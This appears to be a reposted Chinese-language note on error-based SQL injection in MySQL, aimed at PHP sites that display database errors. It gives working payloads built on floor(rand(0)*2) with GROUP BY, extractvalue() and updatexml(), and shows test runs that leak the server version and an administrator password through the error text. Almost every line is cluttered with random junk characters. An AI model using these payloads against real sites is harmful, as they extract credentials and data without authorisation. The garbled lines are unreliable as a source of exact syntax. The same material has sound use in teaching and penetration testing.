放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。8 q' x* v# B P% G; V
实际测试环境:6 ~; U( i b/ I- U* L
, X! L$ l: q# d* h4 t
# Z! v+ \7 T- Q7 C2 W+ Q2 r3 V8 m, Z$ r3 ]
mysql> show tables;) l; Z: E9 ~* u- x
+----------------+# z* f( ]6 V5 F- E) M1 Y+ I
| Tables_in_test | K" I0 X2 B+ l
+----------------+7 E$ [2 h+ G4 x: N* |
| admin |) U l& r( t4 O
| article |
" X! C. {9 Q3 h" }) n; B) ~- j+----------------+% C5 `4 }# U7 |% p3 m5 d$ n
8 }3 p; M5 w! f- W! y) A3 `8 v
; Y! E) v/ B9 {7 y( }* k
% g2 S- e- I) p+ M
mysql> describe admin;
; `# L; [4 k/ v$ Z5 b. Z3 u' X* o+-------+------------------+------+-----+---------+----------------+
' s( Q. M2 g8 D/ {+ R9 e% K1 [| Field | Type | Null | Key | Default | Extra |$ D' l! v: h+ d
+-------+------------------+------+-----+---------+----------------+! f- e2 [7 |5 \$ W7 z/ E1 Q
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |# S4 ?, ~ e3 Z( p; x' j; b
| user | varchar(50) | NO | | NULL | |; A( F# I. k/ E1 T
| pass | varchar(50) | NO | | NULL | | F% i* q! n6 b" [3 |2 W
+-------+------------------+------+-----+---------+----------------+
! F0 N, |1 S* f
% v3 o: z+ O2 ~ S8 V U0 @ ; V7 ^$ r- O5 A5 [6 d
: Z8 ^) u: ~" Q4 p+ L; K/ _
mysql> describe article;6 ?4 m9 q* c, D: K
+---------+------------------+------+-----+---------+----------------+
( S8 h! `3 ]: J| Field | Type | Null | Key | Default | Extra |
) b" k( r% f( @# Y! R7 h6 T+---------+------------------+------+-----+---------+----------------+
6 f' c+ W% Z2 I% m+ Z4 w. G| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
; c; A/ {6 g# R6 Y, J- X. ]2 G| title | varchar(50) | NO | | NULL | |
! g; E8 ? B* Q- v7 {- Y v4 L% j# Y| content | varchar(50) | NO | | NULL | |
. }: w4 V( T2 t+---------+------------------+------+-----+---------+----------------+
$ S6 V# I! G4 l9 `1、通过floor报错' D1 Z- o3 Z: i
可以通过如下一些利用代码, z! P- J+ B9 r, w O, y
" {# ]5 L9 Q, G3 z7 r) K ( @, X8 d% ^$ d2 B7 S( _5 S' Q9 e
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
- j+ |* J. N; p; E/ qfrom information_schema.tables group by x)a);( b2 D: s9 I) p0 G
: u4 O- O: J$ f$ b8 g) B
( N2 R2 ~ o1 a W: k) aand (select count(*) from (select 1 union select null union select !1)x
; l2 Z4 K. @" b! C& k& z& @group by concat((select table_name from information_schema.tables limit 1),
" v( f/ }+ W* I# z$ g- d' U$ x qfloor(rand(0)*2)));6 K4 Y* o' }% y0 W: S
举例如下:
/ z; Z2 ?. O" V9 N2 H/ c首先进行正常查询:+ C {( i' T% F( z2 H# ]4 r* b
& d/ \/ B( V1 P! Q" Q* i5 ^mysql> select * from article where id = 1;9 _2 x2 `# K v$ O: [* q
+----+-------+---------+
4 J h# f8 Y+ E! R0 `- y3 _$ g| id | title | content |6 e$ Q7 B/ ~9 C* S1 n
+----+-------+---------+
- }0 b7 j( d# {7 E; ?| 1 | test | do it |
% t8 h0 A- @5 q& e5 `: u* s/ H+----+-------+---------+
* s \/ `( l7 c; `4 m5 ^假如id输入存在注入的话,可以通过如下语句进行报错。# c4 }, b3 `8 I2 l
/ W9 G' R) _9 t& g( E( w( C
6 t9 u8 n3 B" Z9 Z2 E( G ]mysql> select * from article where id = 1 and (select 1 from
/ m! M% X6 ~( R1 {1 f- Z& n5 |* A(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
& w: G0 y; i2 V1 X# U+ X% I& ?( aERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'" Q' u! D Q& U# j' k3 e( I
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
6 u3 k7 u: d3 c6 A例如我们需要查询管理员用户名和密码:; U) e' z. `8 ~$ Q! _7 [
Method1:3 Y9 B, J* C2 x+ o$ l% e! N8 a+ x
* D$ [' H% m% S( F S: U7 m
4 M+ W6 y9 r0 @5 O6 {+ tmysql> select * from article where id = 1 and (select 1 from% r5 ]! O- h" D( [) b
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
9 u" b. j" o( W7 s# Rfrom information_schema.tables group by x)a);1 F2 \8 ?$ {, t: A2 m1 D
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'$ G9 ^& W2 r1 l; |, @% Z+ Q
Method2:
l" h) `$ {9 ~. j+ r- }9 f & _5 a; @2 C0 p% b" d
9 k' @- d6 t8 \1 v. P7 A) z
mysql> select * from article where id = 1 and (select count(*)
( Q0 U8 \$ F8 v' V! I" c! c# @0 ufrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
. A$ N' c8 f/ |( x% Ufloor(rand(0)*2)));
$ S5 _) ?: Z9 g) g4 Z0 H h6 TERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
5 z4 V0 N. }' M; t2、ExtractValue: W$ }+ I, V! j7 `; j0 r6 ~
测试语句如下/ x% T! H: x& |6 o" e
: A4 o9 k* ~$ C0 ^' p
1 {2 n8 a# D3 r: x
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));& t/ u6 \' _% P: e) ^5 h7 n
实际测试过程
' z, g/ N; z- L( d( e+ i ! S+ Q+ `- O! }3 S8 X
( K8 E# G8 X# E
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,4 [' X& ?2 x' P& T0 q+ ?
(select pass from admin limit 1)));--/ U$ ]3 S. S) S( Q1 H
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
/ ?/ x: A! r3 M# E: Z8 A1 B4 G; w3、UpdateXml
* |" f9 _( C" S测试语句
& U1 C# d3 \. T v+ y& X( z% ^; V) [, ` " M, H! @" v* M
, ]& W9 X! }! D9 X4 ]# m- V
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
5 t9 p3 r2 g& I% N9 ]5 s( R实际测试过程
: ^5 r, _2 I9 C* j6 u7 k/ `
5 Q9 l( Z" w# e" ]! x0 N ) s1 m2 w2 E8 k7 F; m" T/ T
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,7 w* J, r( r) b& V- |5 |
(select pass from admin limit 1),0x5e24),1));0 A0 J$ L+ Q. ]; ~! C2 c' } u
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
: Z9 H8 [ [$ r3 ^' E/ ?$ q) jAll, thanks foreign guys.) X; l2 \+ d7 {" N5 Z) p$ ?
# }' n& v4 [( y" M9 {! D
- b5 T! H2 q) P |